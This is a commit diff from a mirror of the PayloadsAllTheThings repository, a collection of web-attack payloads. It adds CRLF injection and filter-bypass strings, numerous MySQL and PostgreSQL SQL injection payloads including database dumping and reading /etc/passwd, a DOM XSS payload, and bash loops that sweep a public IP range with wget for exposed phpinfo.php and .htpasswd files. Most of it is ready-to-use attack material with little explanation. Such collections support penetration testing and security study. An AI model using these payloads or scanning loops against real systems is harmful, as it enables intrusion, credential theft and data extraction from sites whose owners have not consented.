mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Enumeration added and improvement for CRLF/XSS/SQL
This commit is contained in:
parent
341295dc4b
commit
c73124a79d
@ -26,7 +26,7 @@ x-xss-protection: 1; mode=block
|
|||||||
## CRLF - Write HTML
|
## CRLF - Write HTML
|
||||||
Requested page
|
Requested page
|
||||||
```
|
```
|
||||||
http://www.example.net/index.php?lang=en%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
||||||
```
|
```
|
||||||
|
|
||||||
HTTP response
|
HTTP response
|
||||||
@ -41,5 +41,20 @@ Content-Length: 34
|
|||||||
|
|
||||||
<html>You have been Phished</html>```
|
<html>You have been Phished</html>```
|
||||||
|
|
||||||
|
|
||||||
|
## CRLF - Filter Bypass
|
||||||
|
Using UTF-8 encoding
|
||||||
|
```
|
||||||
|
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
|
||||||
|
```
|
||||||
|
Remainder:
|
||||||
|
* %E5%98%8A = %0A = \u560a
|
||||||
|
* %E5%98%8D = %0D = \u560d
|
||||||
|
* %E5%98%BE = %3E = \u563e (>)
|
||||||
|
* %E5%98%BC = %3C = \u563c (<)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://www.owasp.org/index.php/CRLF_Injection
|
* https://www.owasp.org/index.php/CRLF_Injection
|
27
Enumeration_and_fingerprinting.md
Normal file
27
Enumeration_and_fingerprinting.md
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
# Collection of usefull scripts and tricks
|
||||||
|
|
||||||
|
## Dorks
|
||||||
|
|
||||||
|
Google Dork to find subdomains
|
||||||
|
```
|
||||||
|
site:*.domain.com -www
|
||||||
|
```
|
||||||
|
|
||||||
|
## Scripts
|
||||||
|
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||||
|
```
|
||||||
|
#!/bin/bash
|
||||||
|
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||||
|
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||||
|
```
|
||||||
|
|
||||||
|
Script to detect all .htpasswd files in a range of IPs
|
||||||
|
```
|
||||||
|
#!/bin/bash
|
||||||
|
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||||
|
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
27
README.md
27
README.md
@ -1,16 +1,17 @@
|
|||||||
# Payloads All The Things
|
# Payloads All The Things
|
||||||
A list of usefull payloads and bypasses for Web Application Security
|
A list of usefull payloads and bypasses for Web Application Security
|
||||||
Feel free to improve with your payloads (I <3 pull requests) :)
|
Feel free to improve with your payloads and techniques !
|
||||||
|
I <3 pull requests :)
|
||||||
|
|
||||||
To improve:
|
Last modifications :
|
||||||
* RCE
|
* XSS paylods improved
|
||||||
* SQL injection
|
* CRLF payloads improved
|
||||||
* XXE
|
* SQLi payloads improved
|
||||||
* SSRF
|
* Enumeration added (WIP)
|
||||||
* Upload
|
|
||||||
* Tar command exec
|
TODO : Basic methodology for hunting bugs and vulnerabilities
|
||||||
* Traversal Directory
|
|
||||||
* XSS
|
# More resources
|
||||||
* PHP Include
|
Book's list:
|
||||||
* CSV Injection
|
* Web Hacking 101 - https://leanpub.com/web-hacking-101
|
||||||
* PHP Serialization
|
* The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
# SQL injection
|
# SQL injection
|
||||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||||
|
|
||||||
## Exploit
|
## Authentication bypass and Entry point detection
|
||||||
|
|
||||||
Detection of an SQL injection entry point
|
Detection of an SQL injection entry point
|
||||||
```
|
```
|
||||||
@ -30,14 +30,50 @@ SELECT id FROM users WHERE username='' or true-- AND password='input2'
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
MySQL Error Based
|
# MYSQL
|
||||||
|
MySQL Union Based
|
||||||
|
```
|
||||||
|
gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
|
gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||||
|
gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||||
|
gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
MySQL Error Based - Basic
|
||||||
```
|
```
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
MYSQL Error Based - UpdateXML function
|
||||||
|
```
|
||||||
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||||
|
```
|
||||||
|
|
||||||
MySQL Blind SQL
|
MYSQL Error Based - Extractvalue function
|
||||||
|
```
|
||||||
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
|
```
|
||||||
|
|
||||||
|
MySQL Blind with MAKE_SET
|
||||||
|
```
|
||||||
|
MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
|
MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||||
|
MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||||
|
MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
MySQL Time Based
|
||||||
```
|
```
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
```
|
```
|
||||||
@ -48,6 +84,24 @@ MySQL Read content of a file
|
|||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
|
MySQL DIOS - Dump in One Shot
|
||||||
|
```
|
||||||
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||||
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
# POSTGRESQL
|
||||||
|
|
||||||
|
PostgreSQL Error Based - Basic
|
||||||
|
```
|
||||||
|
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||||
|
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
|
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
|
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||||
|
```
|
||||||
|
|
||||||
|
# Other usefull payloads
|
||||||
|
|
||||||
Polyglot injection (multicontext)
|
Polyglot injection (multicontext)
|
||||||
```
|
```
|
||||||
|
@ -83,6 +83,11 @@ XSS in Hidden input
|
|||||||
Use CTRL+SHIFT+X to trigger the onclick event
|
Use CTRL+SHIFT+X to trigger the onclick event
|
||||||
```
|
```
|
||||||
|
|
||||||
|
DOM XSS
|
||||||
|
```
|
||||||
|
#"><img src=/ onerror=alert(2)>
|
||||||
|
```
|
||||||
|
|
||||||
## XSS in wrappers javascript and data
|
## XSS in wrappers javascript and data
|
||||||
XSS with javascript:
|
XSS with javascript:
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user